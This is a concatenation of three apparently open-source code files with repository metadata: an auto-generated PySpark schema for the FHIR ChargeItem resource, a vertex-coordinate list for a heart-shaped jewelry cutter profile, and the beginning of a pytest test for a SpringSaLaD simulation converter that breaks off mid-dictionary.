24debae6980fb520fe55aa199bdfd43c0092eb9c
|
[
"Apache-2.0"
] | null | null | null |
from typing import Union, List, Optional
from pyspark.sql.types import (
StructType,
StructField,
StringType,
ArrayType,
DataType,
TimestampType,
)
# This file is auto-generated by generate_schema so do not edit it manually
# noinspection PyPep8Naming
class ChargeItemSchema:
"""
The resource ChargeItem describes the provision of healthcare provider
products for a certain patient, therefore referring not only to the product,
but containing in addition details of the provision, like date, time, amounts
and participating organizations and persons. Main Usage of the ChargeItem is
to enable the billing process and internal cost allocation.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueUrl",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
include_modifierExtension: Optional[bool] = False,
) -> Union[StructType, DataType]:
"""
The resource ChargeItem describes the provision of healthcare provider
products for a certain patient, therefore referring not only to the product,
but containing in addition details of the provision, like date, time, amounts
and participating organizations and persons. Main Usage of the ChargeItem is
to enable the billing process and internal cost allocation.
resourceType: This is a ChargeItem resource
id: The logical id of the resource, as used in the URL for the resource. Once
assigned, this value never changes.
meta: The metadata about the resource. This is content that is maintained by the
infrastructure. Changes to the content might not always be associated with
version changes to the resource.
implicitRules: A reference to a set of rules that were followed when the resource was
constructed, and which must be understood when processing the content. Often,
this is a reference to an implementation guide that defines the special rules
along with other profiles etc.
language: The base language in which the resource is written.
text: A human-readable narrative that contains a summary of the resource and can be
used to represent the content of the resource to a human. The narrative need
not encode all the structured data, but is required to contain sufficient
detail to make it "clinically safe" for a human to just read the narrative.
Resource definitions may define what content should be represented in the
narrative to ensure clinical safety.
contained: These resources do not have an independent existence apart from the resource
that contains them - they cannot be identified independently, and nor can they
have their own independent transaction scope.
extension: May be used to represent additional information that is not part of the basic
definition of the resource. To make the use of extensions safe and manageable,
there is a strict set of governance applied to the definition and use of
extensions. Though any implementer can define an extension, there is a set of
requirements that SHALL be met as part of the definition of the extension.
modifierExtension: May be used to represent additional information that is not part of the basic
definition of the resource and that modifies the understanding of the element
that contains it and/or the understanding of the containing element's
descendants. Usually modifier elements provide negation or qualification. To
make the use of extensions safe and manageable, there is a strict set of
governance applied to the definition and use of extensions. Though any
implementer is allowed to define an extension, there is a set of requirements
that SHALL be met as part of the definition of the extension. Applications
processing a resource are required to check for modifier extensions.
Modifier extensions SHALL NOT change the meaning of any elements on Resource
or DomainResource (including cannot change the meaning of modifierExtension
itself).
identifier: Identifiers assigned to this event performer or other systems.
definitionUri: References the (external) source of pricing information, rules of application
for the code this ChargeItem uses.
definitionCanonical: References the source of pricing information, rules of application for the
code this ChargeItem uses.
status: The current state of the ChargeItem.
partOf: ChargeItems can be grouped to larger ChargeItems covering the whole set.
code: A code that identifies the charge, like a billing code.
subject: The individual or set of individuals the action is being or was performed on.
context: The encounter or episode of care that establishes the context for this event.
occurrenceDateTime: Date/time(s) or duration when the charged service was applied.
occurrencePeriod: Date/time(s) or duration when the charged service was applied.
occurrenceTiming: Date/time(s) or duration when the charged service was applied.
performer: Indicates who or what performed or participated in the charged service.
performingOrganization: The organization requesting the service.
requestingOrganization: The organization performing the service.
costCenter: The financial cost center permits the tracking of charge attribution.
quantity: Quantity of which the charge item has been serviced.
bodysite: The anatomical location where the related service has been applied.
factorOverride: Factor overriding the factor determined by the rules associated with the code.
priceOverride: Total price of the charge overriding the list price associated with the code.
overrideReason: If the list price or the rule-based factor associated with the code is
overridden, this attribute can capture a text to indicate the reason for this
action.
enterer: The device, practitioner, etc. who entered the charge item.
enteredDate: Date the charge item was entered.
reason: Describes why the event occurred in coded or textual form.
service: Indicated the rendered service that caused this charge.
productReference: Identifies the device, food, drug or other product being charged either by
type code or reference to an instance.
productCodeableConcept: Identifies the device, food, drug or other product being charged either by
type code or reference to an instance.
account: Account into which this ChargeItems belongs.
note: Comments made about the event by the performer, subject or other participants.
supportingInformation: Further information supporting this charge.
"""
from spark_fhir_schemas.r4.simple_types.id import idSchema
from spark_fhir_schemas.r4.complex_types.meta import MetaSchema
from spark_fhir_schemas.r4.simple_types.uri import uriSchema
from spark_fhir_schemas.r4.simple_types.code import codeSchema
from spark_fhir_schemas.r4.complex_types.narrative import NarrativeSchema
from spark_fhir_schemas.r4.complex_types.resourcelist import ResourceListSchema
from spark_fhir_schemas.r4.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.r4.complex_types.identifier import IdentifierSchema
from spark_fhir_schemas.r4.simple_types.canonical import canonicalSchema
from spark_fhir_schemas.r4.complex_types.reference import ReferenceSchema
from spark_fhir_schemas.r4.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.r4.complex_types.period import PeriodSchema
from spark_fhir_schemas.r4.complex_types.timing import TimingSchema
from spark_fhir_schemas.r4.complex_types.chargeitem_performer import (
ChargeItem_PerformerSchema,
)
from spark_fhir_schemas.r4.complex_types.quantity import QuantitySchema
from spark_fhir_schemas.r4.simple_types.decimal import decimalSchema
from spark_fhir_schemas.r4.complex_types.money import MoneySchema
from spark_fhir_schemas.r4.simple_types.datetime import dateTimeSchema
from spark_fhir_schemas.r4.complex_types.annotation import AnnotationSchema
if (
max_recursion_limit
and nesting_list.count("ChargeItem") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["ChargeItem"]
schema = StructType(
[
# This is a ChargeItem resource
StructField("resourceType", StringType(), True),
# The logical id of the resource, as used in the URL for the resource. Once
# assigned, this value never changes.
StructField(
"id",
idSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The metadata about the resource. This is content that is maintained by the
# infrastructure. Changes to the content might not always be associated with
# version changes to the resource.
StructField(
"meta",
MetaSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A reference to a set of rules that were followed when the resource was
# constructed, and which must be understood when processing the content. Often,
# this is a reference to an implementation guide that defines the special rules
# along with other profiles etc.
StructField(
"implicitRules",
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The base language in which the resource is written.
StructField(
"language",
codeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# A human-readable narrative that contains a summary of the resource and can be
# used to represent the content of the resource to a human. The narrative need
# not encode all the structured data, but is required to contain sufficient
# detail to make it "clinically safe" for a human to just read the narrative.
# Resource definitions may define what content should be represented in the
# narrative to ensure clinical safety.
StructField(
"text",
NarrativeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# These resources do not have an independent existence apart from the resource
# that contains them - they cannot be identified independently, and nor can they
# have their own independent transaction scope.
StructField(
"contained",
ArrayType(
ResourceListSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the resource. To make the use of extensions safe and manageable,
# there is a strict set of governance applied to the definition and use of
# extensions. Though any implementer can define an extension, there is a set of
# requirements that SHALL be met as part of the definition of the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# May be used to represent additional information that is not part of the basic
# definition of the resource and that modifies the understanding of the element
# that contains it and/or the understanding of the containing element's
# descendants. Usually modifier elements provide negation or qualification. To
# make the use of extensions safe and manageable, there is a strict set of
# governance applied to the definition and use of extensions. Though any
# implementer is allowed to define an extension, there is a set of requirements
# that SHALL be met as part of the definition of the extension. Applications
# processing a resource are required to check for modifier extensions.
#
# Modifier extensions SHALL NOT change the meaning of any elements on Resource
# or DomainResource (including cannot change the meaning of modifierExtension
# itself).
StructField(
"modifierExtension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Identifiers assigned to this event performer or other systems.
StructField(
"identifier",
ArrayType(
IdentifierSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# References the (external) source of pricing information, rules of application
# for the code this ChargeItem uses.
StructField(
"definitionUri",
ArrayType(
uriSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# References the source of pricing information, rules of application for the
# code this ChargeItem uses.
StructField(
"definitionCanonical",
ArrayType(
canonicalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The current state of the ChargeItem.
StructField("status", StringType(), True),
# ChargeItems can be grouped to larger ChargeItems covering the whole set.
StructField(
"partOf",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# A code that identifies the charge, like a billing code.
StructField(
"code",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The individual or set of individuals the action is being or was performed on.
StructField(
"subject",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The encounter or episode of care that establishes the context for this event.
StructField(
"context",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date/time(s) or duration when the charged service was applied.
StructField("occurrenceDateTime", TimestampType(), True),
# Date/time(s) or duration when the charged service was applied.
StructField(
"occurrencePeriod",
PeriodSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date/time(s) or duration when the charged service was applied.
StructField(
"occurrenceTiming",
TimingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Indicates who or what performed or participated in the charged service.
StructField(
"performer",
ArrayType(
ChargeItem_PerformerSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# The organization requesting the service.
StructField(
"performingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The organization performing the service.
StructField(
"requestingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The financial cost center permits the tracking of charge attribution.
StructField(
"costCenter",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Quantity of which the charge item has been serviced.
StructField(
"quantity",
QuantitySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# The anatomical location where the related service has been applied.
StructField(
"bodysite",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Factor overriding the factor determined by the rules associated with the code.
StructField(
"factorOverride",
decimalSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Total price of the charge overriding the list price associated with the code.
StructField(
"priceOverride",
MoneySchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# If the list price or the rule-based factor associated with the code is
# overridden, this attribute can capture a text to indicate the reason for this
# action.
StructField("overrideReason", StringType(), True),
# The device, practitioner, etc. who entered the charge item.
StructField(
"enterer",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Date the charge item was entered.
StructField(
"enteredDate",
dateTimeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Describes why the event occurred in coded or textual form.
StructField(
"reason",
ArrayType(
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Indicated the rendered service that caused this charge.
StructField(
"service",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Identifies the device, food, drug or other product being charged either by
# type code or reference to an instance.
StructField(
"productReference",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Identifies the device, food, drug or other product being charged either by
# type code or reference to an instance.
StructField(
"productCodeableConcept",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
),
True,
),
# Account into which this ChargeItems belongs.
StructField(
"account",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Comments made about the event by the performer, subject or other participants.
StructField(
"note",
ArrayType(
AnnotationSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
# Further information supporting this charge.
StructField(
"supportingInformation",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
include_modifierExtension=include_modifierExtension,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
if not include_modifierExtension:
schema.fields = [
c
if c.name != "modifierExtension"
else StructField("modifierExtension", StringType(), True)
for c in schema.fields
]
return schema
| 51.175418
| 106
| 0.546835
| 3,733
| 42,885
| 6.02143
| 0.107152
| 0.075274
| 0.04738
| 0.072604
| 0.864979
| 0.851232
| 0.841312
| 0.809992
| 0.80581
| 0.789483
| 0
| 0.003144
| 0.414014
| 42,885
| 837
| 107
| 51.236559
| 0.891325
| 0.247406
| 0
| 0.765176
| 0
| 0
| 0.0202
| 0.002759
| 0
| 0
| 0
| 0
| 0
| 1
| 0.001597
| false
| 0
| 0.033546
| 0
| 0.039936
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ad965fd326a5ccf4b854d74a86cef58e6f8f6fc6
| 3,167
|
py
|
Python
|
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | null | null | null |
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | null | null | null |
op_cutter/profile_heart.py
|
AlexanderMazaletskiy/jewelcraft
|
b40937471a8c9a823760666156600aaa424eb322
|
[
"MIT"
] | 1
|
2020-06-17T07:46:45.000Z
|
2020-06-17T07:46:45.000Z
|
vertex_coords = (
(0.0, 0.3371, 0.0),
(-0.0229, 0.3378, 0.0),
(-0.0449, 0.3398, 0.0),
(-0.066, 0.3429, 0.0),
(-0.0864, 0.3467, 0.0),
(-0.1062, 0.3511, 0.0),
(-0.1255, 0.3557, 0.0),
(-0.1445, 0.3603, 0.0),
(-0.1633, 0.3646, 0.0),
(-0.1819, 0.3684, 0.0),
(-0.2006, 0.3715, 0.0),
(-0.2193, 0.3735, 0.0),
(-0.2383, 0.3742, 0.0),
(-0.2577, 0.3734, 0.0),
(-0.2776, 0.3707, 0.0),
(-0.298, 0.366, 0.0),
(-0.3192, 0.359, 0.0),
(-0.3377, 0.3514, 0.0),
(-0.3551, 0.3432, 0.0),
(-0.3716, 0.3343, 0.0),
(-0.387, 0.3248, 0.0),
(-0.4015, 0.3145, 0.0),
(-0.4151, 0.3036, 0.0),
(-0.4277, 0.2918, 0.0),
(-0.4394, 0.2793, 0.0),
(-0.4501, 0.266, 0.0),
(-0.46, 0.2519, 0.0),
(-0.469, 0.2368, 0.0),
(-0.477, 0.2209, 0.0),
(-0.4843, 0.2041, 0.0),
(-0.4907, 0.1863, 0.0),
(-0.4962, 0.1675, 0.0),
(-0.5009, 0.1478, 0.0),
(-0.5043, 0.1263, 0.0),
(-0.5056, 0.104, 0.0),
(-0.5049, 0.0812, 0.0),
(-0.5024, 0.0577, 0.0),
(-0.4981, 0.0337, 0.0),
(-0.4921, 0.0092, 0.0),
(-0.4846, -0.0157, 0.0),
(-0.4757, -0.0409, 0.0),
(-0.4654, -0.0664, 0.0),
(-0.4539, -0.0922, 0.0),
(-0.4413, -0.118, 0.0),
(-0.4278, -0.144, 0.0),
(-0.4133, -0.17, 0.0),
(-0.3981, -0.1959, 0.0),
(-0.3822, -0.2217, 0.0),
(-0.3657, -0.2474, 0.0),
(-0.3454, -0.2771, 0.0),
(-0.3242, -0.3058, 0.0),
(-0.3022, -0.3334, 0.0),
(-0.2796, -0.3599, 0.0),
(-0.2564, -0.3852, 0.0),
(-0.2328, -0.4093, 0.0),
(-0.2088, -0.4323, 0.0),
(-0.1847, -0.4541, 0.0),
(-0.1606, -0.4747, 0.0),
(-0.1365, -0.494, 0.0),
(-0.1126, -0.5121, 0.0),
(-0.089, -0.5288, 0.0),
(-0.0658, -0.5443, 0.0),
(-0.0432, -0.5585, 0.0),
(-0.0212, -0.5713, 0.0),
(0.0, -0.5828, 0.0),
(0.0212, -0.5713, 0.0),
(0.0432, -0.5585, 0.0),
(0.0658, -0.5443, 0.0),
(0.089, -0.5288, 0.0),
(0.1126, -0.5121, 0.0),
(0.1365, -0.494, 0.0),
(0.1606, -0.4747, 0.0),
(0.1847, -0.4541, 0.0),
(0.2088, -0.4323, 0.0),
(0.2328, -0.4093, 0.0),
(0.2564, -0.3852, 0.0),
(0.2796, -0.3599, 0.0),
(0.3022, -0.3334, 0.0),
(0.3242, -0.3058, 0.0),
(0.3454, -0.2771, 0.0),
(0.3657, -0.2474, 0.0),
(0.3822, -0.2217, 0.0),
(0.3981, -0.1959, 0.0),
(0.4133, -0.17, 0.0),
(0.4278, -0.144, 0.0),
(0.4413, -0.118, 0.0),
(0.4539, -0.0922, 0.0),
(0.4654, -0.0664, 0.0),
(0.4757, -0.0409, 0.0),
(0.4846, -0.0157, 0.0),
(0.4921, 0.0092, 0.0),
(0.4981, 0.0337, 0.0),
(0.5024, 0.0577, 0.0),
(0.5049, 0.0812, 0.0),
(0.5056, 0.104, 0.0),
(0.5043, 0.1263, 0.0),
(0.5009, 0.1478, 0.0),
(0.4962, 0.1675, 0.0),
(0.4907, 0.1863, 0.0),
(0.4843, 0.2041, 0.0),
(0.477, 0.2209, 0.0),
(0.469, 0.2368, 0.0),
(0.46, 0.2519, 0.0),
(0.4501, 0.266, 0.0),
(0.4394, 0.2793, 0.0),
(0.4277, 0.2918, 0.0),
(0.4151, 0.3036, 0.0),
(0.4015, 0.3145, 0.0),
(0.387, 0.3248, 0.0),
(0.3716, 0.3343, 0.0),
(0.3551, 0.3432, 0.0),
(0.3377, 0.3514, 0.0),
(0.3192, 0.359, 0.0),
(0.298, 0.366, 0.0),
(0.2776, 0.3707, 0.0),
(0.2577, 0.3734, 0.0),
(0.2383, 0.3742, 0.0),
(0.2193, 0.3735, 0.0),
(0.2006, 0.3715, 0.0),
(0.1819, 0.3684, 0.0),
(0.1633, 0.3646, 0.0),
(0.1445, 0.3603, 0.0),
(0.1255, 0.3557, 0.0),
(0.1062, 0.3511, 0.0),
(0.0864, 0.3467, 0.0),
(0.066, 0.3429, 0.0),
(0.0449, 0.3398, 0.0),
(0.0229, 0.3378, 0.0),
)
| 24.175573
| 25
| 0.476476
| 770
| 3,167
| 1.958442
| 0.17013
| 0.343501
| 0.258621
| 0.009284
| 0.983422
| 0.983422
| 0.983422
| 0.983422
| 0.96817
| 0
| 0
| 0.564528
| 0.163246
| 3,167
| 130
| 26
| 24.361538
| 0.004528
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ad98f65b342dd1768033b9d004268d583eaec36d
| 22,809
|
py
|
Python
|
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
simulariumio/tests/converters/test_springsalad_converter.py
|
allen-cell-animated/simularium-conversion
|
47ba9a5a8105cf5cd36592d859252df642b1f1f9
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pytest
from simulariumio.springsalad import SpringsaladConverter, SpringsaladData
from simulariumio import DisplayData, MetaData, InputFileData
from simulariumio.constants import (
DEFAULT_CAMERA_SETTINGS,
CURRENT_VERSION,
DISPLAY_TYPE,
)
@pytest.mark.parametrize(
"trajectory, expected_data",
[
# truncated data from tutorial example
(
SpringsaladData(
sim_view_txt_file=InputFileData(
file_path=(
"simulariumio/tests/data/springsalad/"
"Simulation0_SIM_VIEW_Run0.txt"
),
),
meta_data=MetaData(
scale_factor=0.1,
),
display_data={
"GREEN": DisplayData(
name="A",
radius=10.0,
display_type=DISPLAY_TYPE.OBJ,
url="a.obj",
color="#dfdacd",
),
"RED": DisplayData(
name="B",
color="#0080ff",
),
},
draw_bonds=False,
),
{
"trajectoryInfo": {
"version": CURRENT_VERSION.TRAJECTORY_INFO,
"timeUnits": {
"magnitude": 1.0,
"name": "s",
},
"timeStepSize": 0.1,
"totalSteps": 2,
